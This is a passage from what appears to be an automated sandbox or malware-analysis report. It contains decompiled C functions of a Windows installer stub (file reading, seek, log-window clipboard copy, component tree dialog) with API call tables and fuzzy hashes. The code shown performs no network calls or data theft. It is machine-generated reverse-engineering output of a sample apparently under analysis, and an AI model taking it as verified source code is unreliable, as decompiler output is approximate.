                    APIs
                    • GetFileAttributesA.KERNELBASE(?,004053EE,?,?,?), ref: 004055E7
                    • SetFileAttributesA.KERNEL32(?,00000000), ref: 004055F9
                    Memory Dump Source
                    • Source File: 00000000.00000002.293500532.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.293492940.0000000000400000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.293514085.0000000000407000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.293540080.0000000000409000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.293963975.000000000042C000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.294066816.0000000000434000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.294188478.0000000000437000.00000002.00020000.sdmp
                    Similarity
                    • API ID: AttributesFile
                    • String ID:
                    • API String ID: 3188754299-0
                    • Opcode ID: 499c41a265c8c72c251eb99c81a2d8ea197c0ca55525d81af5d9f53b6a62e1c9
                    • Instruction ID: a5fed976df330e3c9be42370ef6aa70fcab56a8ff4bebce8f9239a379cf4a5bf
                    • Opcode Fuzzy Hash: 499c41a265c8c72c251eb99c81a2d8ea197c0ca55525d81af5d9f53b6a62e1c9
                    • Instruction Fuzzy Hash: 77C04CB1808501BBD6015B34DF0D85F7B66EF50721B108B35F66AE04F4C7355C66EB1A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00403066(void* _a4, long _a8) {
                    				int _t6;
                    				long _t10;
                    
                    				_t10 = _a8;
                    				_t6 = ReadFile( *0x409010, _a4, _t10,  &_a8, 0); // executed
                    				if(_t6 == 0 || _a8 != _t10) {
                    					return 0;
                    				} else {
                    					return 1;
                    				}
                    			}


                    APIs
                    • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,00402E93,000000FF,00000004,00000000,00000000,00000000), ref: 0040307D
                    Memory Dump Source
                    • Source File: 00000000.00000002.293500532.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.293492940.0000000000400000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.293514085.0000000000407000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.293540080.0000000000409000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.293963975.000000000042C000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.294066816.0000000000434000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.294188478.0000000000437000.00000002.00020000.sdmp
                    Similarity
                    • API ID: FileRead
                    • String ID:
                    • API String ID: 2738559852-0
                    • Opcode ID: b55c46bdf794a51955d6c22ef273c930d40ecd644cbb4da6e13cbea0766faea3
                    • Instruction ID: db7eb9ea6f1a12052482ff51ad32c18cee35d2953ec2f1fcf73c5929b0b6aa83
                    • Opcode Fuzzy Hash: b55c46bdf794a51955d6c22ef273c930d40ecd644cbb4da6e13cbea0766faea3
                    • Instruction Fuzzy Hash: 84E08631251119BBCF105E719C04E9B3B5CEB053A5F008033FA55E5190D530DA50DBA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00403098(long _a4) {
                    				long _t2;
                    
                    				_t2 = SetFilePointer( *0x409010, _a4, 0, 0); // executed
                    				return _t2;
                    			}


                    APIs
                    • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402DD2,000081E4), ref: 004030A6
                    Memory Dump Source
                    • Source File: 00000000.00000002.293500532.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.293492940.0000000000400000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.293514085.0000000000407000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.293540080.0000000000409000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.293963975.000000000042C000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.294066816.0000000000434000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.294188478.0000000000437000.00000002.00020000.sdmp
                    Similarity
                    • API ID: FilePointer
                    • String ID:
                    • API String ID: 973152223-0
                    • Opcode ID: a4f108b6483d59a247dd719aa3338c70368b303c79d310cc125f674897935547
                    • Instruction ID: 0cdacc43d416a0c3c320ce55ce8d4373a9ea66752a7e2c64ddc4eeaf6ba3fa4d
                    • Opcode Fuzzy Hash: a4f108b6483d59a247dd719aa3338c70368b303c79d310cc125f674897935547
                    • Instruction Fuzzy Hash: 49B01271644200BFDA214F00DF05F057B31B790700F108430B394380F082712420EB0D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Non-executed Functions

                    C-Code - Quality: 96%
                    			E00404E07(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
                    				struct HWND__* _v8;
                    				long _v12;
                    				struct tagRECT _v28;
                    				void* _v36;
                    				signed int _v40;
                    				int _v44;
                    				int _v48;
                    				signed int _v52;
                    				int _v56;
                    				void* _v60;
                    				void* _v68;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				long _t87;
                    				unsigned int _t92;
                    				unsigned int _t93;
                    				int _t94;
                    				int _t95;
                    				long _t98;
                    				void* _t101;
                    				intOrPtr _t123;
                    				struct HWND__* _t127;
                    				int _t149;
                    				int _t150;
                    				struct HWND__* _t154;
                    				struct HWND__* _t158;
                    				struct HMENU__* _t160;
                    				long _t162;
                    				void* _t163;
                    				short* _t164;
                    
                    				_t154 =  *0x42e344; // 0x0
                    				_t149 = 0;
                    				_v8 = _t154;
                    				if(_a8 != 0x110) {
                    					__eflags = _a8 - 0x405;
                    					if(_a8 == 0x405) {
                    						CloseHandle(CreateThread(0, 0, E00404D9B, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
                    					}
                    					__eflags = _a8 - 0x111;
                    					if(_a8 != 0x111) {
                    						L17:
                    						__eflags = _a8 - 0x404;
                    						if(_a8 != 0x404) {
                    							L25:
                    							__eflags = _a8 - 0x7b;
                    							if(_a8 != 0x7b) {
                    								goto L20;
                    							}
                    							__eflags = _a12 - _t154;
                    							if(_a12 != _t154) {
                    								goto L20;
                    							}
                    							_t87 = SendMessageA(_t154, 0x1004, _t149, _t149);
                    							__eflags = _t87 - _t149;
                    							_a8 = _t87;
                    							if(_t87 <= _t149) {
                    								L37:
                    								return 0;
                    							}
                    							_t160 = CreatePopupMenu();
                    							AppendMenuA(_t160, _t149, 1, E0040594D(_t149, _t154, _t160, _t149, 0xffffffe1));
                    							_t92 = _a16;
                    							__eflags = _t92 - 0xffffffff;
                    							if(_t92 != 0xffffffff) {
                    								_t150 = _t92;
                    								_t93 = _t92 >> 0x10;
                    								__eflags = _t93;
                    								_t94 = _t93;
                    							} else {
                    								GetWindowRect(_t154,  &_v28);
                    								_t150 = _v28.left;
                    								_t94 = _v28.top;
                    							}
                    							_t95 = TrackPopupMenu(_t160, 0x180, _t150, _t94, _t149, _a4, _t149);
                    							_t162 = 1;
                    							__eflags = _t95 - 1;
                    							if(_t95 == 1) {
                    								_v60 = _t149;
                    								_v48 = 0x429fd8;
                    								_v44 = 0xfff;
                    								_a4 = _a8;
                    								do {
                    									_a4 = _a4 - 1;
                    									_t98 = SendMessageA(_v8, 0x102d, _a4,  &_v68);
                    									__eflags = _a4 - _t149;
                    									_t162 = _t162 + _t98 + 2;
                    								} while (_a4 != _t149);
                    								OpenClipboard(_t149);
                    								EmptyClipboard();
                    								_t101 = GlobalAlloc(0x42, _t162);
                    								_a4 = _t101;
                    								_t163 = GlobalLock(_t101);
                    								do {
                    									_v48 = _t163;
                    									_t164 = _t163 + SendMessageA(_v8, 0x102d, _t149,  &_v68);
                    									 *_t164 = 0xa0d;
                    									_t163 = _t164 + 2;
                    									_t149 = _t149 + 1;
                    									__eflags = _t149 - _a8;
                    								} while (_t149 < _a8);
                    								GlobalUnlock(_a4);
                    								SetClipboardData(1, _a4);
                    								CloseClipboard();
                    							}
                    							goto L37;
                    						}
                    						__eflags =  *0x42e32c - _t149; // 0x0
                    						if(__eflags == 0) {
                    							ShowWindow( *0x42eb68, 8);
                    							__eflags =  *0x42ebec - _t149; // 0x0
                    							if(__eflags == 0) {
                    								E00404CC9( *((intOrPtr*)( *0x4297a8 + 0x34)), _t149);
                    							}
                    							E00403CB6(1);
                    							goto L25;
                    						}
                    						 *0x4293a0 = 2;
                    						E00403CB6(0x78);
                    						goto L20;
                    					} else {
                    						__eflags = _a12 - 0x403;
                    						if(_a12 != 0x403) {
                    							L20:
                    							return E00403D44(_a8, _a12, _a16);
                    						}
                    						ShowWindow( *0x42e330, _t149);
                    						ShowWindow(_t154, 8);
                    						E00403D12(_t154);
                    						goto L17;
                    					}
                    				}
                    				_v52 = _v52 | 0xffffffff;
                    				_v40 = _v40 | 0xffffffff;
                    				_v60 = 2;
                    				_v56 = 0;
                    				_v48 = 0;
                    				_v44 = 0;
                    				asm("stosd");
                    				asm("stosd");
                    				_t123 =  *0x42eb70; // 0x6bfe70
                    				_a8 =  *((intOrPtr*)(_t123 + 0x5c));
                    				_a12 =  *((intOrPtr*)(_t123 + 0x60));
                    				 *0x42e330 = GetDlgItem(_a4, 0x403);
                    				 *0x42e328 = GetDlgItem(_a4, 0x3ee);
                    				_t127 = GetDlgItem(_a4, 0x3f8);
                    				 *0x42e344 = _t127;
                    				_v8 = _t127;
                    				E00403D12( *0x42e330);
                    				 *0x42e334 = E0040456B(4);
                    				 *0x42e34c = 0;
                    				GetClientRect(_v8,  &_v28);
                    				_v52 = _v28.right - GetSystemMetrics(0x15);
                    				SendMessageA(_v8, 0x101b, 0,  &_v60);
                    				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
                    				if(_a8 >= 0) {
                    					SendMessageA(_v8, 0x1001, 0, _a8);
                    					SendMessageA(_v8, 0x1026, 0, _a8);
                    				}
                    				if(_a12 >= _t149) {
                    					SendMessageA(_v8, 0x1024, _t149, _a12);
                    				}
                    				_push( *((intOrPtr*)(_a16 + 0x30)));
                    				_push(0x1b);
                    				E00403CDD(_a4);
                    				if(( *0x42eb78 & 0x00000003) != 0) {
                    					ShowWindow( *0x42e330, _t149);
                    					if(( *0x42eb78 & 0x00000002) != 0) {
                    						 *0x42e330 = _t149;
                    					} else {
                    						ShowWindow(_v8, 8);
                    					}
                    					E00403D12( *0x42e328);
                    				}
                    				_t158 = GetDlgItem(_a4, 0x3ec);
                    				SendMessageA(_t158, 0x401, _t149, 0x75300000);
                    				if(( *0x42eb78 & 0x00000004) != 0) {
                    					SendMessageA(_t158, 0x409, _t149, _a12);
                    					SendMessageA(_t158, 0x2001, _t149, _a8);
                    				}
                    				goto L37;
                    			}


                    APIs
                    • GetDlgItem.USER32 ref: 00404E66
                    • GetDlgItem.USER32 ref: 00404E75
                    • GetClientRect.USER32 ref: 00404EB2
                    • GetSystemMetrics.USER32 ref: 00404EBA
                    • SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 00404EDB
                    • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00404EEC
                    • SendMessageA.USER32(?,00001001,00000000,00000110), ref: 00404EFF
                    • SendMessageA.USER32(?,00001026,00000000,00000110), ref: 00404F0D
                    • SendMessageA.USER32(?,00001024,00000000,?), ref: 00404F20
                    • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00404F42
                    • ShowWindow.USER32(?,00000008), ref: 00404F56
                    • GetDlgItem.USER32 ref: 00404F77
                    • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00404F87
                    • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 00404FA0
                    • SendMessageA.USER32(00000000,00002001,00000000,00000110), ref: 00404FAC
                    • GetDlgItem.USER32 ref: 00404E84
                      • Part of subcall function 00403D12: SendMessageA.USER32(00000028,?,00000001,00403B43), ref: 00403D20
                    • GetDlgItem.USER32 ref: 00404FC9
                    • CreateThread.KERNEL32 ref: 00404FD7
                    • CloseHandle.KERNEL32(00000000), ref: 00404FDE
                    • ShowWindow.USER32(00000000), ref: 00405002
                    • ShowWindow.USER32(00000000,00000008), ref: 00405007
                    • ShowWindow.USER32(00000008), ref: 0040504E
                    • SendMessageA.USER32(00000000,00001004,00000000,00000000), ref: 00405080
                    • CreatePopupMenu.USER32 ref: 00405091
                    • AppendMenuA.USER32 ref: 004050A6
                    • GetWindowRect.USER32 ref: 004050B9
                    • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004050DD
                    • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405118
                    • OpenClipboard.USER32(00000000), ref: 00405128
                    • EmptyClipboard.USER32(?,?,00000000,?,00000000), ref: 0040512E
                    • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 00405137
                    • GlobalLock.KERNEL32 ref: 00405141
                    • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405155
                    • GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 0040516D
                    • SetClipboardData.USER32 ref: 00405178
                    • CloseClipboard.USER32 ref: 0040517E
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.293500532.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.293492940.0000000000400000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.293514085.0000000000407000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.293540080.0000000000409000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.293963975.000000000042C000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.294066816.0000000000434000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.294188478.0000000000437000.00000002.00020000.sdmp
                    Similarity
                    • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                    • String ID: {
                    • API String ID: 590372296-366298937
                    • Opcode ID: 3d08310bbd43469a5120837c1ff2279d190d817ca8ed5af4582344c2043299ca
                    • Instruction ID: 6b58894f072d387ff385a1976498fa71d2bdad0bf2474ce794c2d1da48ffa65f
                    • Opcode Fuzzy Hash: 3d08310bbd43469a5120837c1ff2279d190d817ca8ed5af4582344c2043299ca
                    • Instruction Fuzzy Hash: 48A14971900208BFEB219F61DD89AAE7F79FB08355F00407AFA05BA1A0C7755E41DFA9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 98%
                    			E00404618(struct HWND__* _a4, int _a8, unsigned int _a12, int _a16) {
                    				struct HWND__* _v8;
                    				struct HWND__* _v12;
                    				signed int _v16;
                    				intOrPtr _v20;
                    				void* _v24;
                    				long _v28;
                    				int _v32;
                    				signed int _v40;
                    				int _v44;
                    				signed int* _v56;
                    				intOrPtr _v60;
                    				signed int _v64;
                    				long _v68;
                    				void* _v72;
                    				intOrPtr _v76;
                    				intOrPtr _v80;
                    				void* _v84;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				struct HWND__* _t182;
                    				intOrPtr _t183;
                    				int _t189;
                    				int _t196;
                    				intOrPtr _t198;
                    				long _t202;
                    				signed int _t206;
                    				signed int _t217;
                    				void* _t220;
                    				void* _t221;
                    				int _t227;
                    				intOrPtr _t231;
                    				signed int _t232;
                    				signed int _t233;
                    				signed int _t240;
                    				signed int _t242;
                    				signed int _t245;
                    				signed int _t247;
                    				struct HBITMAP__* _t250;
                    				void* _t252;
                    				char* _t268;
                    				signed char _t269;
                    				long _t274;
                    				int _t280;
                    				signed int* _t281;
                    				int _t282;
                    				long _t283;
                    				signed int* _t284;
                    				int _t285;
                    				long _t286;
                    				signed int _t287;
                    				long _t288;
                    				signed int _t291;
                    				int _t294;
                    				signed int _t298;
                    				signed int _t300;
                    				signed int _t302;
                    				intOrPtr _t309;
                    				int* _t310;
                    				void* _t311;
                    				int _t315;
                    				int _t316;
                    				int _t317;
                    				signed int _t318;
                    				void* _t320;
                    				void* _t328;
                    				void* _t331;
                    
                    				_v12 = GetDlgItem(_a4, 0x3f9);
                    				_t182 = GetDlgItem(_a4, 0x408);
                    				_t280 =  *0x42eb88; // 0x6c001c
                    				_t320 = SendMessageA;
                    				_v8 = _t182;
                    				_t183 =  *0x42eb70; // 0x6bfe70
                    				_t315 = 0;
                    				_v32 = _t280;
                    				_v20 = _t183 + 0x94;
                    				if(_a8 != 0x110) {
                    					L23:
                    					__eflags = _a8 - 0x405;
                    					if(_a8 != 0x405) {
                    						_t289 = _a16;
                    					} else {
                    						_a12 = _t315;
                    						_t289 = 1;
                    						_a8 = 0x40f;
                    						_a16 = 1;
                    					}
                    					__eflags = _a8 - 0x4e;
                    					if(_a8 == 0x4e) {
                    						L28:
                    						__eflags = _a8 - 0x413;
                    						_v16 = _t289;
                    						if(_a8 == 0x413) {
                    							L30:
                    							__eflags =  *0x42eb79 & 0x00000002;
                    							if(( *0x42eb79 & 0x00000002) != 0) {
                    								L41:
                    								__eflags = _v16 - _t315;
                    								if(_v16 != _t315) {
                    									_t232 = _v16;
                    									__eflags =  *((intOrPtr*)(_t232 + 8)) - 0xfffffe6e;
                    									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6e) {
                    										SendMessageA(_v8, 0x419, _t315,  *(_t232 + 0x5c));
                    									}
                    									_t233 = _v16;
                    									__eflags =  *((intOrPtr*)(_t233 + 8)) - 0xfffffe6a;
                    									if( *((intOrPtr*)(_t233 + 8)) == 0xfffffe6a) {
                    										__eflags =  *((intOrPtr*)(_t233 + 0xc)) - 2;
                    										if( *((intOrPtr*)(_t233 + 0xc)) != 2) {
                    											_t284 =  *(_t233 + 0x5c) * 0x418 + _t280 + 8;
                    											 *_t284 =  *_t284 & 0xffffffdf;
                    											__eflags =  *_t284;
                    										} else {
                    											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) | 0x00000020;
                    										}
                    									}
                    								}
                    								goto L48;
                    							}
                    							__eflags = _a8 - 0x413;
                    							if(_a8 == 0x413) {
                    								L33:
                    								__eflags = _a8 - 0x413;
                    								_t289 = 0 | _a8 != 0x00000413;
                    								_t240 = E00404598(_v8, _a8 != 0x413);
                    								__eflags = _t240 - _t315;
                    								if(_t240 >= _t315) {
                    									_t93 = _t280 + 8; // 0x8
                    									_t310 = _t240 * 0x418 + _t93;
                    									_t289 =  *_t310;
                    									__eflags = _t289 & 0x00000010;
                    									if((_t289 & 0x00000010) == 0) {
                    										__eflags = _t289 & 0x00000040;
                    										if((_t289 & 0x00000040) == 0) {
                    											_t298 = _t289 ^ 0x00000001;
                    											__eflags = _t298;
                    										} else {
                    											_t300 = _t289 ^ 0x00000080;
                    											__eflags = _t300;
                    											if(_t300 >= 0) {
                    												_t298 = _t300 & 0xfffffffe;
                    											} else {
                    												_t298 = _t300 | 0x00000001;
                    											}
                    										}
                    										 *_t310 = _t298;
                    										E0040117D(_t240);
                    										_t242 =  *0x42eb78; // 0x80
                    										_t289 = 1;
                    										_a8 = 0x40f;
                    										_t245 =  !_t242 >> 0x00000008 & 1;
                    										__eflags = _t245;
                    										_a12 = 1;
                    										_a16 = _t245;
                    									}
                    								}
                    								goto L41;
                    							}
                    							_t289 = _a16;
                    							__eflags =  *((intOrPtr*)(_t289 + 8)) - 0xfffffffe;
                    							if( *((intOrPtr*)(_t289 + 8)) != 0xfffffffe) {
                    								goto L41;
                    							}
                    							goto L33;
                    						}
                    						__eflags =  *((intOrPtr*)(_t289 + 4)) - 0x408;
                    						if( *((intOrPtr*)(_t289 + 4)) != 0x408) {
                    							goto L48;
                    						}
                    						goto L30;
                    					} else {
                    						__eflags = _a8 - 0x413;
                    						if(_a8 != 0x413) {
                    							L48:
                    							__eflags = _a8 - 0x111;
                    							if(_a8 != 0x111) {
                    								L56:
                    								__eflags = _a8 - 0x200;
                    								if(_a8 == 0x200) {
                    									SendMessageA(_v8, 0x200, _t315, _t315);
                    								}
                    								__eflags = _a8 - 0x40b;
                    								if(_a8 == 0x40b) {
                    									_t220 =  *0x429fb4;
                    									__eflags = _t220 - _t315;
                    									if(_t220 != _t315) {
                    										ImageList_Destroy(_t220);
                    									}
                    									_t221 =  *0x429fcc;
                    									__eflags = _t221 - _t315;
                    									if(_t221 != _t315) {
                    										GlobalFree(_t221);
                    									}
                    									 *0x429fb4 = _t315;
                    									 *0x429fcc = _t315;
                    									 *0x42ebc0 = _t315;
                    								}
                    								__eflags = _a8 - 0x40f;
                    								if(_a8 != 0x40f) {
                    									L86:
                    									__eflags = _a8 - 0x420;
                    									if(_a8 == 0x420) {
                    										__eflags =  *0x42eb79 & 0x00000001;
                    										if(( *0x42eb79 & 0x00000001) != 0) {
                    											__eflags = _a16 - 0x20;
                    											_t189 = (0 | _a16 == 0x00000020) << 3;
                    											__eflags = _t189;
                    											_t316 = _t189;
                    											ShowWindow(_v8, _t316);
                    											ShowWindow(GetDlgItem(_a4, 0x3fe), _t316);
                    										}
                    									}
                    									goto L89;
                    								} else {
                    									E004011EF(_t289, _t315, _t315);
                    									__eflags = _a12 - _t315;
                    									if(_a12 != _t315) {
                    										E0040140B(8);
                    									}
                    									__eflags = _a16 - _t315;
                    									if(_a16 == _t315) {
                    										L73:
                    										E004011EF(_t289, _t315, _t315);
                    										__eflags =  *0x42eb8c - _t315; // 0x2
                    										_v32 =  *0x429fcc;
                    										_t196 =  *0x42eb88; // 0x6c001c
                    										_v60 = 0xf030;
                    										_v16 = _t315;
                    										if(__eflags <= 0) {
                    											L84:
                    											InvalidateRect(_v8, _t315, 1);
                    											_t198 =  *0x42e33c; // 0x6c4e95
                    											__eflags =  *((intOrPtr*)(_t198 + 0x10)) - _t315;
                    											if( *((intOrPtr*)(_t198 + 0x10)) != _t315) {
                    												E004044B6(0x3ff, 0xfffffffb, E0040456B(5));
                    											}
                    											goto L86;
                    										} else {
                    											_t142 = _t196 + 8; // 0x6c0024
                    											_t281 = _t142;
                    											do {
                    												_t202 =  *((intOrPtr*)(_v32 + _v16 * 4));
                    												__eflags = _t202 - _t315;
                    												if(_t202 != _t315) {
                    													_t291 =  *_t281;
                    													_v68 = _t202;
                    													__eflags = _t291 & 0x00000001;
                    													_v72 = 8;
                    													if((_t291 & 0x00000001) != 0) {
                    														_t151 =  &(_t281[4]); // 0x6c0034
                    														_v72 = 9;
                    														_v56 = _t151;
                    														_t154 =  &(_t281[0]);
                    														 *_t154 = _t281[0] & 0x000000fe;
                    														__eflags =  *_t154;
                    													}
                    													__eflags = _t291 & 0x00000040;
                    													if((_t291 & 0x00000040) == 0) {
                    														_t206 = (_t291 & 0x00000001) + 1;
                    														__eflags = _t291 & 0x00000010;
                    														if((_t291 & 0x00000010) != 0) {
                    															_t206 = _t206 + 3;
                    															__eflags = _t206;
                    														}
                    													} else {
                    														_t206 = 3;
                    													}
                    													_t294 = (_t291 >> 0x00000005 & 0x00000001) + 1;
                    													__eflags = _t294;
                    													_v64 = (_t206 << 0x0000000b | _t291 & 0x00000008) + (_t206 << 0x0000000b | _t291 & 0x00000008) | _t291 & 0x00000020;
                    													SendMessageA(_v8, 0x1102, _t294, _v68);
                    													SendMessageA(_v8, 0x110d, _t315,  &_v72);
                    												}
                    												_v16 = _v16 + 1;
                    												_t281 =  &(_t281[0x106]);
                    												__eflags = _v16 -  *0x42eb8c; // 0x2
                    											} while (__eflags < 0);
                    											goto L84;
                    										}
                    									} else {
                    										_t282 = E004012E2( *0x429fcc);
                    										E00401299(_t282);
                    										_t217 = 0;
                    										_t289 = 0;
                    										__eflags = _t282 - _t315;
                    										if(_t282 <= _t315) {
                    											L72:
                    											SendMessageA(_v12, 0x14e, _t289, _t315);
                    											_a16 = _t282;
                    											_a8 = 0x420;
                    											goto L73;
                    										} else {
                    											goto L69;
                    										}
                    										do {
                    											L69:
                    											_t309 = _v20;
                    											__eflags =  *((intOrPtr*)(_t309 + _t217 * 4)) - _t315;
                    											if( *((intOrPtr*)(_t309 + _t217 * 4)) != _t315) {
                    												_t289 = _t289 + 1;
                    												__eflags = _t289;
                    											}
                    											_t217 = _t217 + 1;
                    											__eflags = _t217 - _t282;
                    										} while (_t217 < _t282);
                    										goto L72;
                    									}
                    								}
                    							}
                    							__eflags = _a12 - 0x3f9;
                    							if(_a12 != 0x3f9) {
                    								goto L89;
                    							}
                    							__eflags = _a12 >> 0x10 - 1;
                    							if(_a12 >> 0x10 != 1) {
                    								goto L89;
                    							}
                    							_t227 = SendMessageA(_v12, 0x147, _t315, _t315);
                    							__eflags = _t227 - 0xffffffff;
                    							if(_t227 == 0xffffffff) {
                    								goto L89;
                    							}
                    							_t283 = SendMessageA(_v12, 0x150, _t227, _t315);
                    							__eflags = _t283 - 0xffffffff;
                    							if(_t283 == 0xffffffff) {
                    								L54:
                    								_t283 = 0x20;
                    								L55:
                    								E00401299(_t283);
                    								SendMessageA(_a4, 0x420, _t315, _t283);
                    								_a12 = 1;
                    								_a16 = _t315;
                    								_a8 = 0x40f;
                    								goto L56;
                    							}
                    							_t231 = _v20;
                    							__eflags =  *((intOrPtr*)(_t231 + _t283 * 4)) - _t315;
                    							if( *((intOrPtr*)(_t231 + _t283 * 4)) != _t315) {
                    								goto L55;
                    							}
                    							goto L54;
                    						}
                    						goto L28;
                    					}
                    				} else {
                    					 *0x42ebc0 = _a4;
                    					_t247 =  *0x42eb8c; // 0x2
                    					_t285 = 2;
                    					_v28 = 0;
                    					_v16 = _t285;
                    					 *0x429fcc = GlobalAlloc(0x40, _t247 << 2);
                    					_t250 = LoadBitmapA( *0x42eb60, 0x6e);
                    					 *0x429fc0 =  *0x429fc0 | 0xffffffff;
                    					_v24 = _t250;
                    					 *0x429fc8 = SetWindowLongA(_v8, 0xfffffffc, E00404C19);
                    					_t252 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
                    					 *0x429fb4 = _t252;
                    					ImageList_AddMasked(_t252, _v24, 0xff00ff);
                    					SendMessageA(_v8, 0x1109, _t285,  *0x429fb4);
                    					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
                    						SendMessageA(_v8, 0x111b, 0x10, 0);
                    					}
                    					DeleteObject(_v24);
                    					_t286 = 0;
                    					do {
                    						_t258 =  *((intOrPtr*)(_v20 + _t286 * 4));
                    						if( *((intOrPtr*)(_v20 + _t286 * 4)) != _t315) {
                    							if(_t286 != 0x20) {
                    								_v16 = _t315;
                    							}
                    							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t315, E0040594D(_t286, _t315, _t320, _t315, _t258)), _t286);
                    						}
                    						_t286 = _t286 + 1;
                    					} while (_t286 < 0x21);
                    					_t317 = _a16;
                    					_t287 = _v16;
                    					_push( *((intOrPtr*)(_t317 + 0x30 + _t287 * 4)));
                    					_push(0x15);
                    					E00403CDD(_a4);
                    					_push( *((intOrPtr*)(_t317 + 0x34 + _t287 * 4)));
                    					_push(0x16);
                    					E00403CDD(_a4);
                    					_t318 = 0;
                    					_t288 = 0;
                    					_t328 =  *0x42eb8c - _t318; // 0x2
                    					if(_t328 <= 0) {
                    						L19:
                    						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
                    						goto L20;
                    					} else {
                    						_t311 = _v32 + 8;
                    						_v24 = _t311;
                    						do {
                    							_t268 = _t311 + 0x10;
                    							if( *_t268 != 0) {
                    								_v60 = _t268;
                    								_t269 =  *_t311;
                    								_t302 = 0x20;
                    								_v84 = _t288;
                    								_v80 = 0xffff0002;
                    								_v76 = 0xd;
                    								_v64 = _t302;
                    								_v40 = _t318;
                    								_v68 = _t269 & _t302;
                    								if((_t269 & 0x00000002) == 0) {
                    									__eflags = _t269 & 0x00000004;
                    									if((_t269 & 0x00000004) == 0) {
                    										 *( *0x429fcc + _t318 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v84);
                    									} else {
                    										_t288 = SendMessageA(_v8, 0x110a, 3, _t288);
                    									}
                    								} else {
                    									_v76 = 0x4d;
                    									_v44 = 1;
                    									_t274 = SendMessageA(_v8, 0x1100, 0,  &_v84);
                    									_v28 = 1;
                    									 *( *0x429fcc + _t318 * 4) = _t274;
                    									_t288 =  *( *0x429fcc + _t318 * 4);
                    								}
                    							}
                    							_t318 = _t318 + 1;
                    							_t311 = _v24 + 0x418;
                    							_t331 = _t318 -  *0x42eb8c; // 0x2
                    							_v24 = _t311;
                    						} while (_t331 < 0);
                    						if(_v28 != 0) {
                    							L20:
                    							if(_v16 != 0) {
                    								E00403D12(_v8);
                    								_t280 = _v32;
                    								_t315 = 0;
                    								__eflags = 0;
                    								goto L23;
                    							} else {
                    								ShowWindow(_v12, 5);
                    								E00403D12(_v12);
                    								L89:
                    								return E00403D44(_a8, _a12, _a16);
                    							}
                    						}
                    						goto L19;
                    					}
                    				}
                    			}
                    0x00404636
                    0x0040463c
                    0x0040463e
                    0x00404644
                    0x0040464a
                    0x0040464d
                    0x00404657
                    0x00404660
                    0x00404663
                    0x00404666
                    0x0040488e
                    0x0040488e
                    0x00404895
                    0x004048a9
                    0x00404897
                    0x00404899
                    0x0040489c
                    0x0040489d
                    0x004048a4
                    0x004048a4
                    0x004048ac
                    0x004048b5
                    0x004048c0
                    0x004048c0
                    0x004048c3
                    0x004048c6
                    0x004048d5
                    0x004048d5
                    0x004048dc
                    0x00404954
                    0x00404954
                    0x00404957
                    0x00404959
                    0x0040495c
                    0x00404963
                    0x00404971
                    0x00404971
                    0x00404973
                    0x00404976
                    0x0040497d
                    0x0040497f
                    0x00404983
                    0x004049a0
                    0x004049a4
                    0x004049a4
                    0x00404985
                    0x00404992
                    0x00404992
                    0x00404983
                    0x0040497d
                    0x00000000
                    0x00404957
                    0x004048de
                    0x004048e1
                    0x004048ec
                    0x004048ee
                    0x004048f1
                    0x004048f8
                    0x004048fd
                    0x004048ff
